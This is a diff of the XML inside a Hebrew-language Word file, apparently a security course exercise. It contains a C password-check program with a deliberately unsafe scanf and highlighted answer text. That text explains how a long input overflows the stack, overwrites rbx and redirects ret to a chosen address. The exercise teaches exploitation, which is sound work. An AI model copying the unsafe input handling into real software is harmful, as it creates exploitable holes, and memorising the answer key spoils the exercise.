           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3475,6 +3785,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3503,6 +3814,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3523,6 +3835,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3639,7 +3952,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a'</w:t>
+        <w:t>'a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3651,6 +3975,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3679,6 +4004,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3697,7 +4023,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3807,6 +4144,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3827,6 +4165,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3903,6 +4242,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3921,7 +4261,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(y &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4011,6 +4362,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4031,6 +4383,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4117,6 +4470,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> 26y + </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4137,6 +4491,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4163,8 +4518,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s++;</w:t>
-      </w:r>
+        <w:t>         s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4259,7 +4626,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>y == hash</w:t>
+        <w:t xml:space="preserve">y == </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4271,6 +4649,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4372,6 +4751,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4379,6 +4759,7 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4426,6 +4807,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4436,6 +4818,7 @@
         </w:rPr>
         <w:t>natanz</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4669,7 +5052,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main(){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4712,8 +5117,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> password[</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>password[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4755,8 +5172,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4798,8 +5239,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    scanf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>scanf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4861,8 +5326,42 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPassword(password)){</w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>)){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4884,8 +5383,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>        printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4904,8 +5427,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password);</w:t>
-      </w:r>
+        <w:t>, password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4949,6 +5484,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4969,6 +5505,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5013,8 +5550,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5025,6 +5586,7 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5035,6 +5597,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5076,7 +5639,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5098,6 +5672,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5160,6 +5735,7 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5170,6 +5746,7 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5499,7 +6076,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד אסמבלי של </w:t>
+        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אסמבלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> של </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5522,6 +6123,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5532,6 +6134,7 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5563,13 +6166,36 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
           <w:rFonts w:cs="Arial" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5580,7 +6206,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">הפקודה </w:t>
+        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5591,7 +6217,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ret</w:t>
+        <w:t>0x6f69636f64696c61</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5603,7 +6229,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5612,9 +6238,10 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0x6f69636f64696c61</w:t>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5626,7 +6253,44 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">לאחר הכנסת הסיסמה, 16 התווים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>supercalifragili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ייכנסו לתוך </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5635,6 +6299,29 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -5650,30 +6337,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לאחר הכנסת הסיסמה, 16 התווים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>supercalifragili</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">מעל </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5685,8 +6360,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">ייכנסו לתוך </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> במחסנית יש את </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5696,8 +6372,20 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
+        <w:t>rb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5708,8 +6396,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> ולכן 8 הבתים הבאים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5717,6 +6406,30 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sticexpi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידרסו את הערך שלו.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -5732,8 +6445,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">מעל </w:t>
-      </w:r>
